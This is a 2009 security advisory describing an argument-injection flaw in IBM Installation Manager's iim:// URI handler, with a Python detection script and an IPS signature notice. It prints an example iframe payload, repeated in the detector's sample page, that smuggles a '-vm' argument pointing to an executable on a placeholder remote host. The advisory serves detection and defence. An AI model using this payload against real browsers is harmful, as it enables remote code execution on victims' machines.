IBM Installation Manager Code Execution

October 6, 2009

IBM Installation Manager (IIM) is a software tool that helps to install, update, and modify packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed, it registers the application "IBMIM.exe" as the iim:// scheme handler. The format for the scheme is listed below:

iim://URI

The URI is substituted into the following command, which is then executed:

IBMIM.exe -url "URI"

IBMIM.exe accepts many command line arguments, such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that executes with multiple arguments:

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of the IBMIM.exe arguments through the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing it to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject/execute malicious programs.
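A content-inspection check for the pattern described above, added here as an example (it is not SonicWALL's signature or IBM code): it flags iim: URIs in HTML whose decoded value contains a double quote or a switch-like token, either of which lets text escape the quoted -url "URI" argument. The function names and the placeholder host repository.example are assumptions made for the example.

```python
import html
import re
from urllib.parse import unquote

# iim: URI inside a single- or double-quoted HTML attribute value.
IIM_ATTR = re.compile(r"""=\s*(?:'(iim:[^']*)'|"(iim:[^"]*)")""", re.IGNORECASE)
# Whitespace followed by a dash-prefixed token, i.e. something shaped like a switch.
SWITCH = re.compile(r"\s-{1,2}[A-Za-z]\w*")


def inspect_uri(raw):
    """Return reasons why this URI could escape the quoted -url argument."""
    # Decode HTML entities and percent-escapes so encoded quotes and spaces are caught.
    decoded = unquote(html.unescape(raw))
    body = decoded.split(":", 1)[1].lstrip("/")
    reasons = []
    if '"' in body:
        reasons.append('double quote closes the -url "URI" argument')
    if SWITCH.search(body):
        reasons.append("whitespace followed by a switch-like token")
    return reasons


def scan_html(page):
    """Return (raw_uri, reasons) for every suspicious iim: URI in the page."""
    findings = []
    for match in IIM_ATTR.finditer(page):
        raw = match.group(1) or match.group(2)
        reasons = inspect_uri(raw)
        if reasons:
            findings.append((raw, reasons))
    return findings


# Constructed sample: the advisory's iframe plus a benign link to a placeholder host.
SAMPLE_PAGE = r"""
< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >
<a href="iim://repository.example/packages/my-product">install</a>
"""

if __name__ == "__main__":
    for uri, reasons in scan_html(SAMPLE_PAGE):
        print(uri, "->", "; ".join(reasons))
```

The same two conditions can be applied by a proxy or mail gateway to any iim: link before it reaches a browser.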

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.